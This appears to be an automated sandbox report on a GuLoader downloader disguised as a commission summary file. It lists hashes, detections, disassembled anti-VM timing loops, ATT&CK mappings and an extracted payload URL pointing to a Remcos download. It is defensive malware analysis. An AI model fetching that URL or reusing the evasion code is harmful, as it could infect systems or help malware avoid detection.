Play interactive tour

Edit tour

Windows Analysis Report June-July_Commission_List_Summary-2021.exe

Overview

General Information

Sample Name:	June-July_Commission_List_Summary-2021.exe
Analysis ID:	457757
MD5:	bc6d6f6c55211e9ffc8972f330135da7
SHA1:	07b6f45608594b9ee812a9a95f80e51d644424c9
SHA256:	4326190ec077d66ad458337eed8a4f517cfd354247e921c4d01d9f50d9346e32
Tags:	exeGuLoader
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Found potential dummy code loops (likely to delay analysis)

Machine Learning detection for sample

Tries to detect virtualization through RDTSC time measurements

Abnormal high CPU Usage

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Detected potential crypto function

Program does not show much activity (idle)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

June-July_Commission_List_Summary-2021.exe (PID: 1308 cmdline: 'C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe' MD5: BC6D6F6C55211E9FFC8972F330135DA7)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://91.245.255.54/remcos_a_QlYzBK"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.1304299129.0000000002330000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000001.00000002.1304299129.0000000002330000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://91.245.255.54/remcos_a_QlYzBK"}

Multi AV Scanner detection for submitted file

Show sources

Source: June-July_Commission_List_Summary-2021.exe	Virustotal: Detection: 29%			Perma Link
Source: June-July_Commission_List_Summary-2021.exe	ReversingLabs: Detection: 17%

Machine Learning detection for sample

Show sources

Source: June-July_Commission_List_Summary-2021.exe

Joe Sandbox ML: detected

Source: June-July_Commission_List_Summary-2021.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: http://91.245.255.54/remcos_a_QlYzBK

Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_0233A014 NtAllocateVirtualMemory,	1_2_0233A014
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_0233A23E NtAllocateVirtualMemory,	1_2_0233A23E
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_0233A307 NtAllocateVirtualMemory,	1_2_0233A307
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_0233A07C NtAllocateVirtualMemory,	1_2_0233A07C
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_0233A19C NtAllocateVirtualMemory,	1_2_0233A19C

Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_0233A014	1_2_0233A014
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_02341630	1_2_02341630
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_0233523A	1_2_0233523A
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_02338610	1_2_02338610
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_02333E18	1_2_02333E18
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_02337A74	1_2_02337A74
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_02337E47	1_2_02337E47
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_02338E4D	1_2_02338E4D
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_023366A3	1_2_023366A3
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_02337288	1_2_02337288
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_0233DAEC	1_2_0233DAEC
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_02330EC3	1_2_02330EC3
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_0233EEC4	1_2_0233EEC4
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_02341ACC	1_2_02341ACC
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_0233F323	1_2_0233F323
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_02337B2E	1_2_02337B2E
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_02337F10	1_2_02337F10
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_0233830E	1_2_0233830E
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_0233270D	1_2_0233270D
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_0233EF7F	1_2_0233EF7F
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_02330F6F	1_2_02330F6F
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_0233676C	1_2_0233676C
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_02337345	1_2_02337345
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_02340F4F	1_2_02340F4F
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_0233DFB4	1_2_0233DFB4
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_023377A3	1_2_023377A3
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_02340FA6	1_2_02340FA6
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_02334BA6	1_2_02334BA6
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_023383FA	1_2_023383FA
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_023327E3	1_2_023327E3
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_023353DF	1_2_023353DF
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_023387C4	1_2_023387C4
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_02340830	1_2_02340830
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_02334C39	1_2_02334C39
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_02338C14	1_2_02338C14
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_02337C1B	1_2_02337C1B
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_02338805	1_2_02338805
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_0233E070	1_2_0233E070
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_02337074	1_2_02337074
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_0233A07C	1_2_0233A07C
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_0233E070	1_2_0233E070
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_02330C49	1_2_02330C49
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_023414A5	1_2_023414A5
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_023388AB	1_2_023388AB
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_0233649B	1_2_0233649B
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_0233E535	1_2_0233E535
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_0233812F	1_2_0233812F
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_0233F110	1_2_0233F110
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_02337904	1_2_02337904
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_02341577	1_2_02341577
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_02335574	1_2_02335574
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_0233E554	1_2_0233E554
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_02338149	1_2_02338149
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_0234194F	1_2_0234194F
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_0233819E	1_2_0233819E
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_02338D9C	1_2_02338D9C
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_02336586	1_2_02336586
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_02333DE4	1_2_02333DE4
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_02333DEA	1_2_02333DEA
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_023359CC	1_2_023359CC

Source: June-July_Commission_List_Summary-2021.exe, 00000001.00000000.219924452.0000000000473000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameWivrejaygeesca9.exe vs June-July_Commission_List_Summary-2021.exe
Source: June-July_Commission_List_Summary-2021.exe, 00000001.00000002.1304125341.0000000002250000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs June-July_Commission_List_Summary-2021.exe
Source: June-July_Commission_List_Summary-2021.exe	Binary or memory string: OriginalFilenameWivrejaygeesca9.exe vs June-July_Commission_List_Summary-2021.exe

Source: June-July_Commission_List_Summary-2021.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal88.troj.evad.winEXE@1/0@0/0

Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe

File created: C:\Users\user\AppData\Local\Temp\~DFC32100787B3DE00F.TMP

Jump to behavior

Source: June-July_Commission_List_Summary-2021.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: June-July_Commission_List_Summary-2021.exe	Virustotal: Detection: 29%
Source: June-July_Commission_List_Summary-2021.exe	ReversingLabs: Detection: 17%

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000001.00000002.1304299129.0000000002330000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_00404923 push ds; ret	1_2_00404930
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_0040659A push esp; retf	1_2_0040659B
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_0040569B push ebp; retf	1_2_0040569E
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_00408B7B push ebx; iretd	1_2_00408B82
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_00406F8F push ebp; retf	1_2_00406F93
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_0233AE57 pushad ; retf	1_2_0233AE5F
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_0233AE82 pushad ; retf	1_2_0233AE85
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_023310DE push FA63AFCBh; retf	1_2_023311B9

Source: initial sample

Static PE information: section name: .text entropy: 7.14012596914

Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_02341630	1_2_02341630
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_0233523A	1_2_0233523A
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_0233EEC4	1_2_0233EEC4
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_023353DF	1_2_023353DF
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_0233446F	1_2_0233446F
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_023414A5	1_2_023414A5
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_0233449C	1_2_0233449C
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_0233D52B	1_2_0233D52B
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_02341577	1_2_02341577
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_02335574	1_2_02335574

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	RDTSC instruction interceptor: First address: 000000000233E4B4 second address: 000000000233E4B4 instructions:
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	RDTSC instruction interceptor: First address: 0000000002341AA0 second address: 0000000002341AA0 instructions:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	RDTSC instruction interceptor: First address: 000000000233E4B4 second address: 000000000233E4B4 instructions:
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	RDTSC instruction interceptor: First address: 000000000233DC02 second address: 000000000233DDA2 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov esi, dword ptr [ebp+00000223h] 0x00000011 mov dword ptr [ebp+0000021Bh], eax 0x00000017 mov eax, esi 0x00000019 push eax 0x0000001a cmp dl, cl 0x0000001c mov eax, dword ptr [ebp+0000021Bh] 0x00000022 mov dword ptr [ebp+0000019Ch], ebx 0x00000028 test dx, F826h 0x0000002d mov ebx, edx 0x0000002f test bx, 655Ch 0x00000034 push ebx 0x00000035 mov ebx, dword ptr [ebp+0000019Ch] 0x0000003b call 00007F90ECE82998h 0x00000040 test edx, ebx 0x00000042 mov esi, dword ptr [esp+04h] 0x00000046 mov eax, 020D0734h 0x0000004b xor eax, 97E8A2A4h 0x00000050 jmp 00007F90ECE829F9h 0x00000055 test dx, bx 0x00000058 xor eax, 66496E64h 0x0000005d sub eax, F3ACB6EFh 0x00000062 test ax, cx 0x00000065 test ax, ax 0x00000068 mov dword ptr [ebp+000001DCh], ebx 0x0000006e mov ebx, FD8668ABh 0x00000073 pushad 0x00000074 mov edx, 00000025h 0x00000079 rdtsc
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	RDTSC instruction interceptor: First address: 000000000233DDA2 second address: 000000000233DDA2 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 add ebx, 2EB48951h 0x00000009 xor ebx, 4D05852Ah 0x0000000f test ah, ah 0x00000011 sub ebx, 613F7432h 0x00000017 cmp byte ptr [esi], bl 0x00000019 mov ebx, dword ptr [ebp+000001DCh] 0x0000001f jnc 00007F90EC99618Dh 0x00000021 mov ebx, eax 0x00000023 test dh, ch 0x00000025 shl eax, 05h 0x00000028 add eax, ebx 0x0000002a movzx ecx, byte ptr [esi] 0x0000002d test bh, dh 0x0000002f add eax, ecx 0x00000031 xor eax, 87814D76h 0x00000036 test dh, dh 0x00000038 inc esi 0x00000039 mov dword ptr [ebp+00000199h], ecx 0x0000003f mov ecx, 8083BC92h 0x00000044 cmp edx, E060B676h 0x0000004a test al, bl 0x0000004c xor ecx, 15B192FBh 0x00000052 xor ecx, 1B76C997h 0x00000058 test ecx, eax 0x0000005a xor ecx, 8E44E7FEh 0x00000060 cmp ebx, D7C88536h 0x00000066 cmp dh, FFFFFFD5h 0x00000069 cmp byte ptr [esi], cl 0x0000006b mov ecx, dword ptr [ebp+00000199h] 0x00000071 jne 00007F90EC9960AEh 0x00000077 mov dword ptr [ebp+000001DCh], ebx 0x0000007d mov ebx, FD8668ABh 0x00000082 pushad 0x00000083 mov edx, 00000025h 0x00000088 rdtsc
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	RDTSC instruction interceptor: First address: 0000000002341903 second address: 0000000002341903 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 cmp dword ptr [ebp+000001DAh], ebx 0x00000009 jne 00007F90ECE82916h 0x0000000b xor dword ptr [eax], edx 0x0000000d add eax, 04h 0x00000010 mov dword ptr [ebp+000001DAh], eax 0x00000016 pushad 0x00000017 mov eax, 000000FCh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	RDTSC instruction interceptor: First address: 0000000002341AA0 second address: 0000000002341AA0 instructions:
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	RDTSC instruction interceptor: First address: 000000000233F545 second address: 000000000233DDA2 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b push ecx 0x0000000c mov ecx, dword ptr [ebp+000001B8h] 0x00000012 test bh, dh 0x00000014 mov dword ptr [ebp+0000020Fh], edx 0x0000001a mov edx, ecx 0x0000001c cmp ch, dh 0x0000001e push edx 0x0000001f cmp eax, D3D4D650h 0x00000024 mov edx, dword ptr [ebp+0000020Fh] 0x0000002a mov dword ptr [ebp+0000024Ah], ecx 0x00000030 mov ecx, esi 0x00000032 push ecx 0x00000033 mov ecx, dword ptr [ebp+0000024Ah] 0x00000039 test dl, cl 0x0000003b mov dword ptr [ebp+00000210h], eax 0x00000041 mov eax, esi 0x00000043 push eax 0x00000044 cmp ah, dh 0x00000046 mov eax, dword ptr [ebp+00000210h] 0x0000004c cmp cx, bx 0x0000004f add dword ptr [esp], ecx 0x00000052 call 00007F90ECE8103Eh 0x00000057 test edx, ebx 0x00000059 mov esi, dword ptr [esp+04h] 0x0000005d mov eax, 020D0734h 0x00000062 xor eax, 97E8A2A4h 0x00000067 jmp 00007F90ECE829F9h 0x0000006c test dx, bx 0x0000006f xor eax, 66496E64h 0x00000074 sub eax, F3ACB6EFh 0x00000079 test ax, cx 0x0000007c test ax, ax 0x0000007f mov dword ptr [ebp+000001DCh], ebx 0x00000085 mov ebx, FD8668ABh 0x0000008a pushad 0x0000008b mov edx, 00000025h 0x00000090 rdtsc

Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe

Code function: 1_2_0233A014 rdtsc

1_2_0233A014

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Anti Debugging:

Found potential dummy code loops (likely to delay analysis)

Show sources

Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe

Process Stats: CPU usage > 90% for more than 60s

Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe

Code function: 1_2_0233A014 rdtsc

1_2_0233A014

Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_0233523A mov eax, dword ptr fs:[00000030h]	1_2_0233523A
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_0233E26D mov eax, dword ptr fs:[00000030h]	1_2_0233E26D
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_023366A3 mov eax, dword ptr fs:[00000030h]	1_2_023366A3
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_0233E347 mov eax, dword ptr fs:[00000030h]	1_2_0233E347
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_023397E2 mov eax, dword ptr fs:[00000030h]	1_2_023397E2
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_0233D812 mov eax, dword ptr fs:[00000030h]	1_2_0233D812
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_0233649B mov eax, dword ptr fs:[00000030h]	1_2_0233649B
Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe	Code function: 1_2_02336586 mov eax, dword ptr fs:[00000030h]	1_2_02336586

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: June-July_Commission_List_Summary-2021.exe, 00000001.00000002.1303735073.0000000000DF0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: June-July_Commission_List_Summary-2021.exe, 00000001.00000002.1303735073.0000000000DF0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: June-July_Commission_List_Summary-2021.exe, 00000001.00000002.1303735073.0000000000DF0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: June-July_Commission_List_Summary-2021.exe, 00000001.00000002.1303735073.0000000000DF0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\June-July_Commission_List_Summary-2021.exe

Code function: 1_2_02339235 cpuid

1_2_02339235

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection1	Virtualization/Sandbox Evasion11	OS Credential Dumping	Security Software Discovery41	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Software Packing1	LSASS Memory	Virtualization/Sandbox Evasion11	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	System Information Discovery311	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
June-July_Commission_List_Summary-2021.exe	30%	Virustotal		Browse
June-July_Commission_List_Summary-2021.exe	17%	ReversingLabs	Win32.Trojan.Mucc
June-July_Commission_List_Summary-2021.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://91.245.255.54/remcos_a_QlYzBK	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://91.245.255.54/remcos_a_QlYzBK	true	Avira URL Cloud: safe	unknown

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	457757
Start date:	02.08.2021
Start time:	09:32:27
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	June-July_Commission_List_Summary-2021.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Suspected Instruction Hammering Hide Perf
Number of analysed new started processes analysed:	41
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal88.troj.evad.winEXE@1/0@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 39.5% (good quality ratio 22.2%) Quality average: 32.7% Quality standard deviation: 34.4%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, MusNotifyIcon.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	4.8708154897145
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	June-July_Commission_List_Summary-2021.exe
File size:	471040
MD5:	bc6d6f6c55211e9ffc8972f330135da7
SHA1:	07b6f45608594b9ee812a9a95f80e51d644424c9
SHA256:	4326190ec077d66ad458337eed8a4f517cfd354247e921c4d01d9f50d9346e32
SHA512:	a7947412f8c4d063d8fc4618f806d3900df4a47cc042da6ebbc893f7399eb2be20361ca92c324b31f37ffb896c2b827ca161cf7d24d17ceda0c9a2a8db85afec
SSDEEP:	3072:W1bzponwO9HPBFRXBQnmCpy4eeF9d6tTbsYPYcF4v98C8OZW44PcpLg7SO32OGl0:W1bz+woHOmtmmTNYMSB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L......S.....................@....................@................

File Icon


Icon Hash:	09090d0909040901

Static PE Info

General
Entrypoint:	0x4015bc
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x5317A394 [Wed Mar 5 22:22:12 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	6a2215b83e94f57aa594370ef2448759

Entrypoint Preview

Instruction
push 004027A4h
call 00007F90EC8BD2F5h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi+6A214ED7h], al
shr dword ptr [ebp+48h], cl
mov dl, 49h
jo 00007F90EC8BD324h
lds ebp, esi
